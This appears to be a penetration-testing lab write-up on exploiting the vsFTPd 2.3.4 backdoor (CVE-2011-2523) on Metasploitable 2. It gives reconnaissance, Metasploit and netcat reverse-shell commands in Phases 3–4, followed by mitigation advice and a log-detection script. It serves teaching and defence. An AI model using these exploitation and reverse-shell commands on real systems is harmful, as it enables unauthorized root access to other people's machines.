Related vulnerability
Description
A step-by-step walkthrough of exploiting the vsFTPd 2.3.4 backdoor vulnerability (CVE-2011-2523) in a controlled lab environment, demonstrating reconnaissance, exploitation with Metasploit, and establishing a reverse shell.
Introduction
# Penetration Testing Lab: vsFTPd 2.3.4 Backdoor Exploitation
This repository documents the process of identifying and exploiting the famous backdoor vulnerability in vsFTPd version 2.3.4 within a controlled lab environment (Metasploitable 2).
## Overview
During a routine penetration test, the vsFTPd service running on port 21 was identified as vulnerable. The service was found to be version 2.3.4, which contains a documented backdoor that allows unauthenticated remote command execution. This document details the steps taken to confirm the vulnerability and gain a reverse shell on the target system.
## Vulnerability Details
* **Service:** vsFTPd (Very Secure FTP Daemon)
* **Version:** 2.3.4
* **CVE:** CVE-2011-2523
* **Risk:** Critical (Remote Code Execution)
## Lab Setup
* **Attacker Machine:** Kali Linux
* **Target Machine:** Metasploitable 2
* **Network Configuration:** Both VMs were attached to the same virtual network (NAT and bridged adapters), so the attacker could reach services on the target's local IP address.
## Executive Summary
A critical backdoor was identified in the target's FTP service (vsFTPd 2.3.4). This vulnerability allows an unauthenticated attacker to gain remote command execution, ultimately leading to a full reverse shell on the system.
## Phase 1: Reconnaissance & Enumeration
The initial discovery was made using a port scan with `nmap`.
**Command:**
```bash
nmap -sS -sV -A <target-ip>
```
**Relevant Findings:**
```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
...
```
## Phase 2: Vulnerability Identification
The `2.3.4` version string is the one associated with the backdoor: the vsFTPd 2.3.4 tarball served from the upstream download site was replaced with a trojaned copy for a few days in mid-2011, and Metasploitable 2 ships that build. `searchsploit` was used to look up public exploits for it.
**Commands:**
```bash
searchsploit vsftpd 2.3.4
```
*Output listed several public exploits. Note that this matches on the version string only; a clean 2.3.4 build from another source does not carry the backdoor, so the finding is only confirmed by actually triggering it (Phase 3 and Phase 4).*
## Phase 3: Initial Exploitation Attempts
### Attempt 1: Standalone Python Exploit
A public Python exploit was mirrored and executed but failed due to compatibility issues.
**Commands:**
```bash
searchsploit -m unix/remote/49757.py
python 49757.py <target-ip>
```
*Result: Script error (incompatible with Python 3).*
### Attempt 2: Metasploit Module
The Metasploit Framework provides a reliable exploit module.
**Commands:**
```bash
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>
run
```
*Result: The module reported that the backdoor was triggered (it sends a `USER` command whose argument contains the trigger string `:)`, then connects to the shell the backdoor binds on port 6200), but no Metasploit session was created in this run. Since the port 6200 shell runs as root, it can be collected by hand instead, as in Phase 4.*
## Phase 4: Manual Shell Access
The Metasploit run confirmed the backdoor was present, so the shell on port 6200 was collected manually.
### Step 1: Verify the backdoor listener
```bash
telnet <target-ip> 6200
```
*Observation: the connection was accepted but nothing was printed. This is expected: the backdoor hands the socket to a bare `/bin/sh` with no banner and no prompt, so the session looks hung until a command such as `id` is typed, which returns `uid=0(root) gid=0(root)`.*
### Step 2: Establish a Reverse Shell
The port 6200 shell is a one-shot listener with no prompt or job control, and it has to be triggered again once its connection closes, so a reverse shell was set up with Netcat for a more stable session.
**On Attacker (Kali): Start listener.**
```bash
nc -lvnp 4444
```
**On Target (typed into the port 6200 shell): Connect back.**
```bash
/bin/nc <attacker-ip> 4444 -e /bin/bash
```
* `4444`: Listener port.
* `-e /bin/bash`: Hands the connection to a bash shell. Metasploitable 2 ships the traditional Netcat, which supports `-e`; the OpenBSD variant found on newer systems does not.
*Result: The Netcat listener caught the connection, providing a root shell on the target.*
## Phase 5: Mitigation Strategies
* **Immediate Action:** Replace the daemon with a current vsFTPd release from the distribution's package repository or from upstream with its signature verified. The backdoor lives in the trojaned 2.3.4 tarball, not in the vsFTPd design, so a build from a trusted source is the fix.
* **Network Controls:** If an upgrade is not possible, restrict FTP (port 21) at the firewall to trusted source addresses, block inbound connections to port 6200, and filter egress so a reverse shell like the one in Phase 4 cannot connect back.
* **Compromise Assessment:** A host that ran this build should be treated as fully compromised, since anyone able to reach port 21 could have obtained root. A full forensic investigation and credential resets are required.
* **Monitoring:** Deploy IDS/IPS signatures for the trigger (a `USER` command whose argument contains `:)`) and alert on any listener appearing on port 6200 of an FTP server.
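The two monitoring checks above, written out as detection logic over sample data, as an added example that is not part of the original repository. The log lines are constructed to mimic vsftpd with `log_ftp_protocol=YES`, and the socket table is constructed to mimic `ss -lntp` output; the client addresses, PIDs and timestamps are invented, and the regexes need adapting to any other log format:

```python
"""
Detection for CVE-2011-2523 exploitation attempts, added as an example; it is
not part of the original repository. Sample inputs below are constructed.
"""
import re
from dataclasses import dataclass

BACKDOOR_PORT = 6200
TRIGGER = ":)"

# vsftpd with log_ftp_protocol=YES writes the full command line, quoted.
FTP_COMMAND = re.compile(r'FTP command: Client "(?P<client>[^"]+)", "(?P<cmd>[^"]*)"')
# `ss -lntp` rows: State Recv-Q Send-Q Local:Port Peer:Port Process
SS_LISTEN = re.compile(r"^LISTEN\s+\d+\s+\d+\s+\S+:(?P<port>\d+)\s")


@dataclass(frozen=True)
class Alert:
    client: str
    reason: str


def scan_ftp_log(lines):
    """Flag USER commands whose argument contains the backdoor trigger.

    Matching anywhere in the argument (not only at the end) mirrors the
    daemon's own check, which scans the whole username."""
    alerts = []
    for line in lines:
        m = FTP_COMMAND.search(line)
        if not m:
            continue
        verb, _, arg = m.group("cmd").partition(" ")
        if verb.upper() == "USER" and TRIGGER in arg:
            alerts.append(Alert(m.group("client"), f"backdoor trigger in USER {arg!r}"))
    return alerts


def backdoor_listener_present(ss_lines):
    """Hunt check: a listener on 6200 on an FTP host means the trigger fired."""
    for line in ss_lines:
        m = SS_LISTEN.match(line)
        if m and int(m.group("port")) == BACKDOOR_PORT:
            return True
    return False


# Constructed sample log: one normal login, then a trigger from another client.
SAMPLE_FTP_LOG = """\
Mon Jun 10 14:02:11 2024 [pid 2211] CONNECT: Client "192.168.56.101"
Mon Jun 10 14:02:11 2024 [pid 2211] FTP response: Client "192.168.56.101", "220 (vsFTPd 2.3.4)"
Mon Jun 10 14:02:12 2024 [pid 2211] FTP command: Client "192.168.56.101", "USER msfadmin"
Mon Jun 10 14:02:12 2024 [pid 2211] FTP command: Client "192.168.56.101", "PASS <password>"
Mon Jun 10 14:05:40 2024 [pid 2240] CONNECT: Client "192.168.56.102"
Mon Jun 10 14:05:40 2024 [pid 2240] FTP command: Client "192.168.56.102", "USER 7Hq2:)"
Mon Jun 10 14:05:40 2024 [pid 2240] FTP command: Client "192.168.56.102", "PASS 9a7b"
""".splitlines()

# Constructed `ss -lntp` snapshot taken after the trigger fired.
SAMPLE_SS_TRIGGERED = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      32     0.0.0.0:21        0.0.0.0:*         users:(("vsftpd",pid=2100,fd=3))
LISTEN 0      5      0.0.0.0:6200      0.0.0.0:*         users:(("vsftpd",pid=2240,fd=4))
""".splitlines()

# The same host with no backdoor listener.
SAMPLE_SS_CLEAN = [row for row in SAMPLE_SS_TRIGGERED if ":6200" not in row]


if __name__ == "__main__":
    for alert in scan_ftp_log(SAMPLE_FTP_LOG):
        print(f"ALERT {alert.client}: {alert.reason}")
    print("6200 listening:", backdoor_listener_present(SAMPLE_SS_TRIGGERED))
```

The log check is the same pattern the public Snort/Suricata signatures for this backdoor look for on the wire; keeping a host-side copy matters because the trigger can arrive over a path the sensor does not see. The `ss` check is cheap enough to run from a cron job on every FTP server, and any hit on port 6200 warrants the compromise assessment above.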
## References
- Exploit-DB: [vsftpd 2.3.4 Backdoor Exploit](https://www.exploit-db.com/exploits/17491)
- CVE-2011-2523: [MITRE Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)
- NVD: [National Vulnerability Database Entry](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)
## Disclaimer
This information is for **educational purposes only**. It is intended for use in authorized lab environments to understand attack methodologies and improve defensive strategies. Unauthorized testing against systems you do not own is illegal.
File snapshot
[4.0K] /data/pocs/1e316cd042b13947b0507a09998a4e5c4166ce54
└── [4.2K] README.md
0 directories, 1 file